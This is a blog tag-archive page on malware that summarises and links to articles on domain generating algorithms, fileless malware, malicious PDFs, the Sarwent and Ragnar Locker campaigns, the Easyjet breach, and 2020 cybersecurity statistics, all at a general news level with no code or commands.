Tag Archives: malware

Good Read: Domain Generating Algorithm (DGA)

Abstract

A Domain Generating Algorithm (DGA) is a program or subroutine that provides malware with new domains on demand or on the fly.

History

Kraken was the first malware family to use a DGA (in 2008) that we could find. Later that year, Conficker made DGA a lot more famous.

What’s the use?

The DGA technique is in use because malware that depends on a fixed domain or IP address is quickly blocked, which then hinders operations. So, rather than bringing out a new version of the malware or setting everything up again at a new server, the malware switches to a new domain at regular intervals.

An example of DGA in practice is C&C servers for botnets and ransomware. If we were able to block these or take them down, we would cut the link between the victims and the threat actor. Bots would no longer be able to fetch new instructions and machines infected with ransomware would be unable to request encryption keys and send user data.

The constant changing of the domain for the C&C server is also sometimes called “Domain Fluxing” or “Fast Fluxing”, which actually is a reference to an older technique based on abusing the DNS load balancing system.

Read more in

https://blog.malwarebytes.com/security-world/2016/12/explained-domain-generating-algorithm/

Guide of Fileless Malware and Attack Techniques

Abstract

This is a research report into all aspects of Fileless Attack Malware. It provides the reader with concise information regarding what a Fileless Malware Threat is, how it infiltrates a machine, how it penetrates through a system, and how to prevent attacks of such kind.

This report also highlights why fileless attacks is the fan favourite among attackers in today’s environment. It explores the stealth, and precision of fileless malware, and how it can manipulate built-in system vulnerabilities.

This report was initially intended to be a supportive document to a practical demonstration of Fileless Attack Malware. However, it was not possible in the time allotted to source a fileless malware threat to explore, modify, test or run. As a result, the author investigated the complete theoretical journey of Fileless Attack Malware.

Read More in

https://ukdiss.com/examples/fileless-malware-attack-techniques.php

Fileless malware attacks explained (with examples)

https://www.comparitech.com/blog/information-security/fileless-malware-attacks/

Learn how Malicious PDFs can be used to target you?

Abstract

In some kinds of malicious PDF attacks, the PDF reader itself contains a vulnerability or flaw that allows a file to execute malicious code. Remember that PDF readers aren’t just applications like Adobe Reader and Adobe Acrobat.

Most browsers contain a built-in PDF reader engine that can also be targeted. In other cases, attackers might leverage AcroForms or XFA Forms, scripting technologies used in PDF creation that were intended to add useful, interactive features to a standard PDF document. One of the easiest and most powerful ways to customize PDF files is by using JavaScript.

PDF structure can have embedded javascript objects and could connect to remote servers. Read more in

https://www.sentinelone.com/blog/malicious-pdfs-revealing-techniques-behind-attacks/

Cyber Security headlines of the week

Windows malware opens RDP ports on PCs for future remote access

Security researchers say they’ve spotted a new version of the Sarwent malware that opens RDP (Remote Desktop Protocol) ports on infected computers so hackers could gain hands-on access to infected hosts.

Researchers from SentinelOne, who spotted this new version, believe the Sarwent operators are most likely preparing to sell access to these systems on the cybercrime underworld, a common method of monetizing RDP-capable hosts.

THE SARWENT MALWARE

The Sarwent malware is a lesser-known backdoor trojan that has been around since 2018. In its previous versions, the malware contained a limited set of functionality, such as having the ability to download and install other malware on compromised computers. Read more in

Easyjet Hacks: it wasn’t just a few credit cards: Entire travel itineraries were stolen by hackers

Victims of the Easyjet hack are now being told their entire travel itineraries were accessed by hackers who helped themselves to nine million people’s personal details stored by the budget airline.

As reported earlier this week, the data was stolen from the airline between October 2019 and January this year. Easyjet kept quiet about the hack until mid-May, though around 2,200 people whose credit card details were stolen during the cyber-raid were told of this in early April, months after the attack.

Read more in: https://www.theregister.co.uk/2020/05/22/easyjet_hack_victim_notification/

Ransomware tries to evade antivirus by hiding in a virtual machine on infected systems

With antivirus tools increasingly wise to common infection tricks, one group of extortionists has taken the unusual step of stashing their ransomware inside its own virtual machine.

According to Vikas Singh, Gabor Szappanos, and Mark Loman at Sophos, criminals have slotted the file-scrambling Ragnar Locker nasty into a virtual machine running a variant of Windows XP, called MicroXP. Then, once the crooks have infiltrated a victim’s network and gained administrative access – typically via a weak RDP box or through a compromised managed services provider – they download the VM, along with Oracle’s VirtualBox hypervisor to run it, on each machine they can get into.

Read more in https://www.theregister.co.uk/2020/05/22/byovm_ransomware_in_virtualbox/

Twitter Bots: Roughly half the Twitter accounts pushing to ‘reopen America’ are bots.

As parts of the US have lifted shutdown orders during the COVID-19 pandemic, there’s been a fierce argument online about the risks and benefits of reopening. New research suggests that bots have been dominating that debate.

Read more in https://www.businessinsider.com/nearly-half-of-reopen-america-twitter-accounts-are-bots-report-2020-5?r=US&IR=T

Good Read: Top cybersecurity facts, figures and statistics for 2020

9 key cybersecurity statistics at-a-glance

  • 94% of malware is delivered via email
  • Phishing attacks account for more than 80% of reported security incidents
  • $17,700 is lost every minute due to phishing attacks
  • 60 percent of breaches involved vulnerabilities for which a patch was available but not applied
  • 63 percent of companies said their data was potentially compromised within the last twelve months due to a hardware- or silicon-level security breach
  • Attacks on IoT devices tripled in the first half of 2019.
  • fileless attacks grew by 256 percent over the first half of 2019
  • Data breaches cost enterprises an average of $3.92 million
  • 40 percent of IT leaders say cybersecurity jobs are the most difficult to fill

Read more in

https://www.csoonline.com/article/3153707/top-cybersecurity-facts-figures-and-statistics.html